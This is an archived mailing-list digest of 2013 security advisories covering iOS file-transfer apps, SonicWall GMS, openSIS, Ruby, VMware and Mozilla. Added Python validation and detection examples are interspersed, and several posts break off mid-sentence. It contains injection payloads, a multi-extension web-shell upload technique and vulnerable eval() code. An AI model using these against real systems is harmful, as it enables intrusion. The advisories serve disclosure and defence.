Imagam iFiles v1.16.0 iOS - Multiple Web Vulnerabilities

2013-12-08 Thread Vulnerability Lab
Document Title:
===
Imagam iFiles v1.16.0 iOS - Multiple Web Vulnerabilities


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1160


Release Date:
=
2013-12-03


Vulnerability Laboratory ID (VL-ID):

1160


Common Vulnerability Scoring System:

8.9


Product & Service Introduction:
===
iFiles is the most intuitive file manager for iOS with features like 
connectivity to many file cloud services, 
transferring files between computer or cloud services, ability to view many 
file formats (PDF viewer now 
supports annotations, search and more), voice recorder, web downloader, text 
file editor and more.

Supported Online Cloud Services and Protocols: Dropbox, Google Drive, iCloud, 
Box.net, SkyDrive, SugarSync, AFP 
(Mac Shares), FTP/FTPS, SFTP, Flickr, Picasa, Facebook, Rackspace CloudFiles, 
CloudApp, PogoPlug, WebDav, Amazon 
S3, Ubuntu One Files, ownCloud, 4Shared, also using Amazon S3: DreamObjects and 
UltiCloud.

(Copy of the Homepage: https://itunes.apple.com/de/app/ifiles/id336683524 &
http://imagam.com )


Abstract Advisory Information:
==
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities 
in the official Imagam iFiles v1.16.0 mobile application for apple iOS.


Vulnerability Disclosure Timeline:
==
2013-12-03: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Imagam
Product: iFiles - Mobile Application iOS 1.16.0


Exploitation Technique:
===
Remote


Severity Level:
===
Critical


Technical Details & Description:

1.1
A file include & arbitrary file upload web vulnerability has been discovered 
in the official Imagam iFiles v1.16.0 mobile application for Apple iOS.
An arbitrary file upload issue allows a remote attacker to upload files with 
multiple extensions to bypass the validation for unauthorized access.
A file include web vulnerability allows a remote attacker to include 
unauthorized local web-server file requests or external file requests. 

The vulnerability is located in the vulnerable file- and folder-name values. 
Remote attackers can include local file requests combined with script code 
to successfully exploit the issue. To inject into the vulnerable foldername 
value it is required to manipulate the `create folder` (add) input (POST method).
The second possibility to inject is the vulnerable filename value of the 
misconfigured (POST method) upload module. After the include the remote 
attacker can access the included file by requesting the regular index or 
sub category folder (web interface) site.

The arbitrary file upload vulnerability is located in the vulnerable filename 
value of the upload module. Attackers are also able to upload php or js 
web-shells by renaming the file with multiple extensions. The attacker uploads, 
for example, a web-shell with the following name and extensions: 
test.jpg.html.js.php.gif.jpg. After the upload the attacker opens the file in 
the web application and deletes the .gif.jpg file extension to access the 
resource with elevated execution access rights.

Exploitation of the file include & arbitrary file upload web vulnerability 
requires no user interaction and no privileged application user account with 
password.
Successful exploitation of the vulnerability results in unauthorized file 
access because of a compromise after the upload of web-shells.

Request Method(s):
[+] [POST]

Vulnerable Module(s):
[+] File Upload

Vulnerable Parameter(s):
[+] filename (value) - (multiple extensions)
[+] foldername

Affected Module(s):
[+] File & Folder Dir Listing 
(http://localhost:8080)



1.2
Two local command/path injection web vulnerabilities have been discovered in 
the official Imagam iFiles v1.16.0 mobile application for Apple iOS.
The remote web vulnerability allows injecting local commands via vulnerable 
system values to compromise the Apple mobile iOS application.

The vulnerability is located in the device name value of the file dir 
and sub category listing module. Local attackers are able to inject 
own malicious system specific commands or path value requests as the iOS 
device name. The execution of the injected script code occurs in two 
different sections with a persistent attack vector. The first section is the 
wifi app web-interface index file/folder dir listing. The second 
execution occurs in the file/folder sub category listing. The security risk of 
the local command/path inject vulnerability is estimated as high(-) 
with a cvss (common vulnerability scoring system) count of 

[SECURITY] [DSA 2809-1] ruby1.8 security update

2013-12-08 Thread Salvatore Bonaccorso
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-2809-1   secur...@debian.org
http://www.debian.org/security/  Salvatore Bonaccorso
December 04, 2013  http://www.debian.org/security/faq
- -

Package: ruby1.8
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2013-1821 CVE-2013-4073 CVE-2013-4164
Debian Bug : 702526 714541 730189

Several vulnerabilities have been discovered in the interpreter for the
Ruby language. The Common Vulnerabilities and Exposures project
identifies the following problems:

CVE-2013-1821

Ben Murphy discovered that unrestricted entity expansion in REXML
can lead to a Denial of Service by consuming all host memory.

CVE-2013-4073

William (B.J.) Snow Orvis discovered a vulnerability in the hostname
checking in Ruby's SSL client that could allow man-in-the-middle
attackers to spoof SSL servers via a crafted certificate issued by a
trusted certification authority.

CVE-2013-4164

Charlie Somerville discovered that Ruby incorrectly handled floating
point number conversion. If an application using Ruby accepted
untrusted input strings and converted them to floating point
numbers, an attacker able to provide such input could cause the
application to crash or, possibly, execute arbitrary code with the
privileges of the application.

For the oldstable distribution (squeeze), these problems have been fixed in
version 1.8.7.302-2squeeze2.

For the stable distribution (wheezy), these problems have been fixed in
version 1.8.7.358-7.1+deb7u1.

For the unstable distribution (sid), these problems have been fixed in
version 1.8.7.358-9.

We recommend that you upgrade your ruby1.8 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



[SECURITY] [DSA 2810-1] ruby1.9.1 security update

2013-12-08 Thread Salvatore Bonaccorso
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-2810-1   secur...@debian.org
http://www.debian.org/security/  Salvatore Bonaccorso
December 04, 2013  http://www.debian.org/security/faq
- -

Package: ruby1.9.1
Vulnerability  : heap overflow
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2013-4164
Debian Bug : 730178

Charlie Somerville discovered that Ruby incorrectly handled floating
point number conversion. If an application using Ruby accepted untrusted
input strings and converted them to floating point numbers, an attacker
able to provide such input could cause the application to crash or,
possibly, execute arbitrary code with the privileges of the application.

For the oldstable distribution (squeeze), this problem has been fixed in
version 1.9.2.0-2+deb6u2.

For the stable distribution (wheezy), this problem has been fixed in
version 1.9.3.194-8.1+deb7u2.

For the unstable distribution (sid), this problem has been fixed in
version 1.9.3.484-1.

We recommend that you upgrade your ruby1.9.1 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



Sonicwall GMS v7.x - Filter Bypass Persistent Vulnerability (0Day)

2013-12-08 Thread Vulnerability Lab
Document Title:
===
Sonicwall GMS v7.x - Filter Bypass & Persistent Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1099

Bulletin: Dell SonicWALL GMS Service Bulletin for Cross-Site Scripting 
Vulnerability
http://www.sonicwall.com/us/shared/download/Support_Bulletin_GMS_Vulnerability_Hotfix_134235.pdf


Release Date:
=
2013-12-05


Vulnerability Laboratory ID (VL-ID):

1099


Common Vulnerability Scoring System:

4.1


Product & Service Introduction:
===
Dell SonicWALL`s management and reporting solutions provide a comprehensive 
architecture for centrally creating and managing 
security policies, providing real-time monitoring and alerts, and delivering 
intuitive compliance and usage reports, all from 
a single management interface. Whether your organization is a small- or 
medium-sized business, a distributed enterprise or a 
managed service provider, Dell™ SonicWALL™ offers software and appliance 
solutions to meet its needs.

The award-winning Dell SonicWALL Global Management System (GMS®) provides 
organizations, distributed enterprises and service 
providers with a flexible, powerful and intuitive solution to centrally manage 
and rapidly deploy SonicWALL firewall, anti-spam, 
backup and recovery, and secure remote access solutions. Flexibly deployed as 
software, hardware—in the form of the Universal 
Management Appliance (UMA)—or a virtual appliance, SonicWALL GMS also provides 
centralized real-time monitoring and comprehensive 
policy and compliance reporting to drive down the cost of owning and managing 
SonicWALL security appliances.  Multiple GMS 
software, hardware, and virtual appliance agents, when deployed in a cluster, 
can scale to manage thousands of SonicWALL 
security appliances. This makes GMS an ideal solution for small- to 
medium-sized businesses, enterprises and managed service 
providers that have either single-site or distributed multi-site environments.

(Copy of the Vendor Homepage: 
http://www.sonicwall.com/emea/en/products/Centralized_Management_Reporting.html 
)


Abstract Advisory Information:
==
The Vulnerability Laboratory Research Team discovered a persistent validation 
vulnerability in the DELL SonicWall GMS v7.1.x Appliance Web-Application.


Vulnerability Disclosure Timeline:
==
2013-09-26: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2013-09-27: Vendor Notification (DELL SonicWall Security Team)
2013-10-09: Vendor Response/Feedback (DELL SonicWall Security Team)
2013-12-04: Vendor Fix/Patch ( DELL SonicWall Developer Team)
2013-12-05: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

DELL SonicWall
Product: GMS Networks Appliance Application 7.1


Exploitation Technique:
===
Remote


Severity Level:
===
High


Technical Details & Description:

A persistent input validation web vulnerability has been discovered in the 
official DELL SonicWall GMS v7.1.x Appliance Web-Application.
The bug allows an attacker (remote) to implement/inject own malicious 
script codes on the application-side (persistent).

The persistent vulnerability is located in the `valfield_1` & `value_1` value 
parameters of the `Alert Settings` module POST method request.
Remote attackers with a low privileged application user account can inject own 
script codes into the POST method request of the createNewThreshold.jsp 
appliance application file. After the inject the attacker is able to update and 
save the values to continue with the execution in the main alert 
settings module. The execution of the script code occurs in the 
ematStaticAlertTypes.jsp file context by the earlier manipulated vulnerable 
values.

To bypass the filter it is required to split the request by attaching a double 
frame for the script code execution. The restricted application itself 
disallows the POST request of guests; by usage of the unrestricted context POST 
method request attackers are able to bypass the filter & exception-handling.

The security risk of the persistent input validation web vulnerability is 
estimated as high(-) with a cvss (common vulnerability scoring system) 
count of 4.1(+). The coordinated disclosure procedure of the remote 
vulnerability has been navigated by the product manager Wilson Lee (DELL). 
The hotfix and information have been provided in cooperation with the 
vulnerability-laboratory.

Exploitation of the persistent web vulnerability requires low user interaction 
and a local low privileged (guest) web application user account. 
Successful exploitation of the vulnerability can lead to persistent session 
hijacking (customers), account steal via persistent web 

Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities

2013-12-08 Thread Vulnerability Lab
Document Title:
===
Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1152


Release Date:
=
2013-12-04


Vulnerability Laboratory ID (VL-ID):

1152


Common Vulnerability Scoring System:

6.7


Product & Service Introduction:
===
Wireless Transfer App is an easy to use photo and video transfer tool. It helps 
you easily and quickly transfer photos and videos 
between iPhone and iPad, as well as transfer photos and videos from computer to 
iPad/iPhone/iPod and vice versa. With Wireless 
Transfer App, you can transfer photos and videos from iPad to iPad, from iPad 
to iPhone, from iPhone to iPad, from iPhone to iPhone, 
from computer to iPad, from iPhone to computer and more. There is no need for 
a USB cable or extra software. You just need to put your 
devices on the same Wi-Fi network.

(Copy of the Homepage: 
https://itunes.apple.com/en/app/wireless-transfer-app-share/id543119010  
http://www.wirelesstransferapp.com/ )


Abstract Advisory Information:
==
The Vulnerability Laboratory Research Team discovered multiple command/path 
inject vulnerabilities in the Wireless Transfer App v3.7 for Apple iOS.


Vulnerability Disclosure Timeline:
==
2012-11-30: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Wireless Transfer App COM
Product: Wireless Transfer App 3.7


Exploitation Technique:
===
Remote


Severity Level:
===
High


Technical Details & Description:

A local command/path injection web vulnerability has been discovered in the 
Wireless Transfer App v3.7 for Apple iOS.
The vulnerability allows injecting local commands via vulnerable system values 
to compromise the Apple mobile iOS application.

The vulnerability is located in the album name value of the wireless 
transfer app index and sub category list module.
Remote attackers are able to manipulate iOS device `photo app` (default) 
album names. The execution of the injected 
command/path request occurs in the album sub category list and the main album 
name index list. The security risk of the 
command/path inject vulnerabilities is estimated as high(-) with a cvss 
(common vulnerability scoring system) count of 6.7(-).

Exploitation of the command/path inject vulnerability requires a local low 
privileged iOS device account with restricted access 
and no direct user interaction. Successful exploitation of the vulnerability 
results in unauthorized execution of system specific 
commands or unauthorized path requests.

Vulnerable Application(s):
[+] Wireless Transfer App v3.7

Vulnerable Parameter(s):
[+] album name
[+] photoGallery_head - album

Affected Module(s):
[+] Index - Album Name List
[+] Sub Category - Title Album Name List


Proof of Concept (PoC):
===
The local command inject web vulnerabilities can be exploited by local low 
privileged device user accounts with low 
user interaction. For security demonstration or to reproduce the vulnerability 
follow the information and steps below. 

Manual steps to exploit the vulnerability ...

1. Install the Wireless Transfer v3.7 iOS mobile application
2. Open the default Photo app of your iOS device
3. Include an album with the following payload `%20x 
src=\..\../var/mobile/Library/[x application path]` and save it
4. Switch back to the installed Wireless Transfer app and start the wifi 
transfer
5. Open the local web-server URL http://localhost:6688/ (default link)
6. The local path/command execution occurs in the album name value of the 
photoGallery_head class
7. Successful reproduction of the vulnerability! 


PoC: Album Name - photoGallery_head in the Album Sub Category List

<div class="header">
  <div class="logo"><a href="index.html"><img src="images/logo.png" alt="logo"/></a> </div>
  <div class="title"><a href="index.html"><img src="images/title4.png" alt="logo"/></a></div>
  <div class="button"><a href="upload.html"><img src="images/anniuda2.png" alt=""/></a></div>
  <div class="photoGallery_head">
    <div class="phga_hd_left">Album : %20x src=\..\../[COMMAND/PATH INJECT VULNERABILITY IN ALBUM NAME BY photoGallery_head CLASS!]</div>
    <div class="phga_hd_right">
      <input value="Zurück zur Sammlung" class="back" type="button">
    </div>
  </div>
</div>


PoC: Album Name - photoalbum in the Album Index List

<div class="photo_list">
<dl><dt class="photoalbum" alt="D579B80C-B73D-4A16-9379-FB29A6CFC12C"><a href="albumhtm?id=D579B80C-B73D-4A16-9379-FB29A6CFC12C">
<img src="/albumimg_D579B80C-B73D-4A16-9379-FB29A6CFC12C.jpg" height="100" width="100"/></a></dt>
<dd>%20x 
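Both the iFiles and the Wireless Transfer advisories above describe the same pattern: a device- or user-controlled name (upload filename, folder name, device name, photo album name) is stored as given and later printed raw into the embedded web server's listing. The following is an added example, not code from either app or from Vulnerability Lab, showing the defensive side in Python: a weak "last extension only" check beside a validator that inspects every dotted part of an upload name, a name validator for folder/album/device names, output escaping for the photoGallery_head fragment quoted in the PoC, and a detection helper for stored names that carry markup or path syntax. The allow-lists and the template are constructed for the example.

```python
import html
import re

# Constructed allow-list of extensions the listing is meant to store and serve.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt", "mp4", "mov"}
# Extensions a web server or browser may treat as active content; they are
# rejected anywhere in the name, not only at the end.
ACTIVE_EXTENSIONS = {"php", "php3", "phtml", "js", "html", "htm", "cgi",
                     "pl", "py", "asp", "jsp", "svg"}
# Characters permitted in a file, folder, album or device name that the
# embedded web server will later print into its listing (letters, digits,
# space, dot, underscore, dash; Unicode letters such as umlauts are allowed).
NAME_RE = re.compile(r"^[^\W_][\w ._-]{0,127}$")

# Hardened form of the photoGallery_head fragment quoted in the Wireless
# Transfer PoC: the name is only ever inserted through html.escape().
ALBUM_HEADER_TEMPLATE = (
    '<div class="photoGallery_head">'
    '<div class="phga_hd_left">Album : {album}</div>'
    '<div class="phga_hd_right">'
    '<input value="{back}" class="back" type="button">'
    "</div></div>"
)


def weak_extension_check(filename):
    """The kind of check the iFiles advisory describes being bypassed: only
    the final extension is inspected, so 'test.jpg.html.js.php.gif.jpg'
    passes and the trailing '.gif.jpg' can later be renamed away."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext in ALLOWED_EXTENSIONS


def name_problem(raw):
    """None if `raw` is an acceptable single path component (folder, album
    or device name), otherwise a short reason. Path separators and NUL are
    refused outright, so a name like '..\\../var/mobile/...' never reaches
    the filesystem or the HTML listing."""
    if raw in ("", ".", ".."):
        return "empty or dot name"
    if "/" in raw or "\\" in raw or "\x00" in raw:
        return "path separator or NUL in name"
    if not NAME_RE.match(raw):
        return "character outside the name allow-list"
    return None


def upload_name_problem(raw):
    """None if an upload filename is acceptable, otherwise a reason. Every
    dotted part is inspected: an active extension hidden between harmless
    ones is rejected, and the final extension must be on the allow-list."""
    problem = name_problem(raw)
    if problem:
        return problem
    parts = raw.lower().split(".")
    if len(parts) < 2 or parts[0] == "":
        return "missing base name or extension"
    for inner in parts[1:-1]:
        if inner in ACTIVE_EXTENSIONS:
            return "active extension %r inside the name" % inner
    if parts[-1] not in ALLOWED_EXTENSIONS:
        return "final extension %r not allowed" % parts[-1]
    return None


def render_album_header(album_name, back_label="Back to collection"):
    """Render the album header with the untrusted name escaped at output
    time, so markup or attribute syntax in the name is displayed as text."""
    return ALBUM_HEADER_TEMPLATE.format(
        album=html.escape(album_name, quote=True),
        back=html.escape(back_label, quote=True),
    )


# Detection side: a stored name carrying markup, attribute or path syntax is
# what the injected album and device names in both advisories look like.
SUSPICIOUS_RE = re.compile(r"""[<>"'`\\]|\.\./|%[0-9A-Fa-f]{2}|\bsrc=|\bon\w+=""")


def suspicious_name(name):
    """True when a stored name should be logged and reviewed, not rendered."""
    return bool(SUSPICIOUS_RE.search(name))
```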

[KIS-2013-10] openSIS <= 5.2 (ajax.php) PHP Code Injection Vulnerability

2013-12-08 Thread Egidio Romano

--
openSIS <= 5.2 (ajax.php) PHP Code Injection Vulnerability
--


[-] Software Link:

http://www.opensis.com/


[-] Affected Versions:

All versions from 4.5 to 5.2.


[-] Vulnerability Description:

The vulnerable code is located in the /ajax.php script:

86. if(clean_param($_REQUEST['modname'],PARAM_NOTAGS))
87. {
88.     if($_REQUEST['_openSIS_PDF']=='true')
89.         ob_start();
90.     if(strpos($_REQUEST['modname'],'?')!==false)
91.     {
92.         $vars = substr($_REQUEST['modname'],(strpos($_REQUEST['modname'],'?')+1));
93.         $modname = substr($_REQUEST['modname'],0,strpos($_REQUEST['modname'],'?'));
94.
95.         $vars = explode('?',$vars);
96.         foreach($vars as $code)
97.         {
98.             $code = decode_unicode_url("\$_REQUEST['".str_replace('=',"']=",$code).";");
99.             eval($code);
100.        }
101.    }

User input passed through the modname request variable is not properly
sanitized before being used in a call to the eval() function at line 99.
This can be exploited to inject and execute arbitrary PHP code.



[-] Solution:

As of December 5th, 2013 the only solution is this patch:  
http://sourceforge.net/p/opensis-ce/code/1009



[-] Disclosure Timeline:

[04/12/2012] - Issue reported to http://sourceforge.net/p/opensis-ce/bugs/59/
[28/12/2012] - Vendor contacted, replied that the next version will fix the issue

[12/01/2013] - CVE number requested
[14/01/2013] - CVE number assigned
[26/04/2013] - Version 5.2 released, however the issue isn't fixed yet
[12/05/2013] - Vendor contacted again
[15/05/2013] - Issue temporarily fixed in the SVN repository (r1009)
[04/12/2013] - After one year still no official solution available


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2013-1349 to this vulnerability.


[-] Credits:

Vulnerability discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2013-10
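The root cause above is that ajax.php turns each `key=value` fragment of the modname parameter into PHP source text and passes it to eval(). The parameter convention itself (`module?key=value?key2=value2`, split on `?`) can be handled without any source generation. The following is an added example, not openSIS code and written in Python rather than PHP, of a parser that does that with allow-lists on the module path, the request keys and the value characters; the allow-lists are constructed for the example, and urllib's unquote stands in for the application's decode_unicode_url().

```python
import re
from urllib.parse import unquote

# Constructed allow-lists: the module path shape ajax.php may load, the
# request keys that may be set through the modname convention, and the
# characters a value may contain. Tighten them to the application's real set.
MODULE_RE = re.compile(r"^[A-Za-z0-9_/]+\.php$")
KEY_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
VALUE_RE = re.compile(r"^[\w .,-]{0,200}$")


def parse_modname(modname):
    """Split 'module?key=value?key2=value2', the convention lines 90-101 of
    ajax.php handle, into (module, params) without building source text.
    Raises ValueError for anything outside the allow-lists, which is exactly
    where a quote or bracket smuggled into a key would otherwise land inside
    the string handed to eval()."""
    module, sep, rest = modname.partition("?")
    if not MODULE_RE.match(module):
        raise ValueError("module path outside allow-list: %r" % module)
    params = {}
    if not sep:
        return module, params
    for fragment in rest.split("?"):
        if fragment == "":
            continue
        key, eq, value = fragment.partition("=")
        # urllib's unquote stands in for decode_unicode_url() (assumption).
        key, value = unquote(key), unquote(value)
        if not eq or not KEY_RE.match(key):
            raise ValueError("request key outside allow-list: %r" % key)
        if not VALUE_RE.match(value):
            raise ValueError("request value outside allow-list: %r" % value)
        params[key] = value
    return module, params


def modname_is_acceptable(modname):
    """Boolean wrapper for callers that only need accept/reject."""
    try:
        parse_modname(modname)
    except ValueError:
        return False
    return True


def merge_into_request(request, modname):
    """Apply the parsed parameters to a request dict the way the eval() loop
    populated $_REQUEST, but refuse to overwrite keys the caller already
    received (constructed policy: the URL must not redefine 'modname' or
    '_openSIS_PDF'). Returns the updated dict."""
    module, params = parse_modname(modname)
    for key, value in params.items():
        if key in request:
            raise ValueError("refusing to overwrite request key %r" % key)
        request[key] = value
    request["modname"] = module
    return request
```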




NEW VMSA-2013-0015 VMware ESX updates to third party libraries

2013-12-08 Thread Edward Hawkins
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

  VMware Security Advisory

Advisory ID:  VMSA-2013-0015
Synopsis: VMware ESX updates to third party libraries
Issue date:   2013-12-05
Updated on:   2013-12-05 (initial release)
CVE numbers:  --- kernel (service console) ---
  CVE-2012-2372, CVE-2012-3552, CVE-2013-2147, CVE-2013-2164,
  CVE-2013-2206, CVE-2013-2224, CVE-2013-2234, CVE-2013-2237,
  CVE-2013-2232
  --- nss and nspr (service console) ---
  CVE-2013-0791, CVE-2013-1620
- -
1. Summary

   VMware has updated several third party libraries in ESX that address 
   multiple security vulnerabilities.

2. Relevant releases

   VMware ESX 4.1 without patch ESX410-201312001

3. Problem Description

  a. Update to ESX service console kernel

  The ESX service console kernel is updated to resolve multiple
  security issues.

  The Common Vulnerabilities and Exposures project (cve.mitre.org)
  has assigned the names CVE-2012-2372, CVE-2012-3552, CVE-2013-2147,
  CVE-2013-2164, CVE-2013-2206, CVE-2013-2224, CVE-2013-2234, 
  CVE-2013-2237, CVE-2013-2232 to these issues.

VMware          Product   Running  Replace with/
Product         Version   on       Apply Patch
==============  ========  =======  ===================
ESXi            any       ESXi     not applicable

ESX             4.1       ESX      ESX410-201312401-SG
ESX             4.0       ESX      patch pending

  b. Update to ESX service console NSPR and NSS

  This patch updates the ESX service console Netscape Portable 
  Runtime (NSPR) and Network Security Services (NSS) RPMs to resolve
  multiple security issues. 

  The Common Vulnerabilities and Exposures project (cve.mitre.org)
  has assigned the names CVE-2013-0791 and CVE-2013-1620 to these 
  issues.

  Column 4 of the following table lists the action required to
  remediate the vulnerability in each release, if a solution is
  available.

VMware          Product   Running  Replace with/
Product         Version   on       Apply Patch
==============  ========  =======  ===================
ESXi            any       ESXi     not applicable

ESX             4.1       ESX      ESX410-201312403-SG
ESX             4.0       ESX      patch pending

4. Solution

   Please review the patch/release notes for your product and
   version and verify the checksum of your downloaded file.

   ESX 4.1
   ---
   File: ESX410-201312001.zip
   md5sum: c35763a84db169dd0285442d4129cc18
   sha1sum: ee8e1b8d2d383422ff0dde04749c5d89e77d8e40
   http://kb.vmware.com/kb/2061209
   ESX410-201312001 contains ESX410-201312401-SG and ESX410-201312403-SG.

5. References

   --- kernel (service console) ---
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2372
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3552
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2147
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2164
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2206
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2224
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2234
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2237
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2232

   --- NSPR and NSS (service console) ---
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0791
   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1620

- -

6. Change log

   2013-12-05 VMSA-2013-0015
   Initial security advisory in conjunction with the release of ESX 4.1
   patches on 2013-12-05.

- -

7. Contact

   E-mail list for product security notifications and announcements:
   http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

   This Security Advisory is posted to the following lists:

   * security-announce at lists.vmware.com
   * bugtraq at securityfocus.com
   * full-disclosure at lists.grok.org.uk

   E-mail: security at vmware.com
   PGP key at: http://kb.vmware.com/kb/1055

   VMware Security Advisories
   http://www.vmware.com/security/advisories

   VMware security response policy
   http://www.vmware.com/support/policies/security_response.html

   General support life cycle policy
   http://www.vmware.com/support/policies/eos.html

   VMware Infrastructure support life cycle policy
   http://www.vmware.com/support/policies/eos_vi.html

   Copyright 2013 VMware Inc. All rights reserved.


[slackware-security] mozilla-nss (SSA:2013-339-01)

2013-12-08 Thread Slackware Security Team

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[slackware-security]  mozilla-nss (SSA:2013-339-01)

New mozilla-nss packages are available for Slackware 14.0, 14.1, and -current
to fix security issues.


Here are the details from the Slackware 14.1 ChangeLog:
+--+
patches/packages/mozilla-nss-3.15.3-i486-1_slack14.1.txz:  Upgraded.
  This update contains security fixes and improvements.
  For more information, see:
http://www.mozilla.org/security/announce/2013/mfsa2013-103.html
  (* Security fix *)
+--+


Where to find the new packages:
+-+

Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project!  :-)

Also see the Get Slack section on http://slackware.com for
additional mirror sites near you.

Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/mozilla-nss-3.15.3-i486-1_slack14.0.txz

Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/mozilla-nss-3.15.3-x86_64-1_slack14.0.txz

Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/mozilla-nss-3.15.3-i486-1_slack14.1.txz

Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/mozilla-nss-3.15.3-x86_64-1_slack14.1.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/mozilla-nss-3.15.3-i486-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/mozilla-nss-3.15.3-x86_64-1.txz


MD5 signatures:
+-+

Slackware 14.0 package:
c5d7e5b5b46bedae785d22d0247d70ad  mozilla-nss-3.15.3-i486-1_slack14.0.txz

Slackware x86_64 14.0 package:
f29e0973d99829c08038193b65b5b4b3  mozilla-nss-3.15.3-x86_64-1_slack14.0.txz

Slackware 14.1 package:
9f95b21dc109db67f8e7906521bab61b  mozilla-nss-3.15.3-i486-1_slack14.1.txz

Slackware x86_64 14.1 package:
9f853af467fe81e70bf820677b45c4ad  mozilla-nss-3.15.3-x86_64-1_slack14.1.txz

Slackware -current package:
e90376f0a0b99c8924ddb39d27775e8c  l/mozilla-nss-3.15.3-i486-1.txz

Slackware x86_64 -current package:
95bfee53e035ae57557e150788b83290  l/mozilla-nss-3.15.3-x86_64-1.txz


Installation instructions:
++

Upgrade the package as root:
# upgradepkg mozilla-nss-3.15.3-i486-1_slack14.1.txz


+-+

Slackware Linux Security Team
http://slackware.com/gpg-key
secur...@slackware.com

++
| To leave the slackware-security mailing list:  |
++
| Send an email to majord...@slackware.com with this text in the body of |
| the email message: |
||
|   unsubscribe slackware-security   |
||
| You will get a confirmation message back containing instructions to|
| complete the process.  Please do not reply to this email address.  |
++


[slackware-security] mozilla-thunderbird (SSA:2013-339-02)

2013-12-08 Thread Slackware Security Team

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

[slackware-security]  mozilla-thunderbird (SSA:2013-339-02)

New mozilla-thunderbird packages are available for Slackware 13.37, 14.0, 14.1,
and -current to fix security issues.


Here are the details from the Slackware 14.1 ChangeLog:
+--+
patches/packages/mozilla-thunderbird-24.1.1-i486-1_slack14.1.txz:  Upgraded.
  This release contains security fixes and improvements.
  For more information, see:
http://www.mozilla.org/security/known-vulnerabilities/thunderbird.html
  (* Security fix *)
+--+


Where to find the new packages:
+-+

Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project!  :-)

Also see the Get Slack section on http://slackware.com for
additional mirror sites near you.

Updated package for Slackware 13.37:
ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/mozilla-thunderbird-17.0.11esr-i486-1_slack13.37.txz

Updated package for Slackware x86_64 13.37:
ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/mozilla-thunderbird-17.0.11esr-x86_64-1_slack13.37.txz

Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/mozilla-thunderbird-17.0.11esr-i486-1_slack14.0.txz

Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/mozilla-thunderbird-17.0.11esr-x86_64-1_slack14.0.txz

Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/mozilla-thunderbird-24.1.1-i486-1_slack14.1.txz

Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/mozilla-thunderbird-24.1.1-x86_64-1_slack14.1.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-thunderbird-24.1.1-i486-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-thunderbird-24.1.1-x86_64-1.txz


MD5 signatures:
+-+

Slackware 13.37 package:
4c7fe2a313a7b98c8a33f1c6d0c953ad  mozilla-thunderbird-17.0.11esr-i486-1_slack13.37.txz

Slackware x86_64 13.37 package:
